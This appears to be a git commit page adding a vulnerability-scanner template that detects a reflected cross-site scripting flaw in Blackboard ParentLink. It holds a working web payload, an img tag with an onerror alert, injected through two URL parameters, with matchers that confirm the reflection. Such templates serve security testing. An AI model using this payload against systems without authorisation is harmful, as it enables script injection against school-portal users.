Merge pull request #1066 from r3naissance/master
Add teacherease-xss and parentlink-xss to /vulnerabilities/other/patch-1
commit
47a7ea85e0
|
@ -0,0 +1,31 @@
|
||||||
|
id: parentlink-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Blackboard ParentLink Reflected XSS
|
||||||
|
author: r3naissance
|
||||||
|
severity: medium
|
||||||
|
tags: blackboard,parentlink,xss
|
||||||
|
reference: https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
|
||||||
|
- '{{BaseURL}}/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<img src=c onerror=alert(8675309)>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue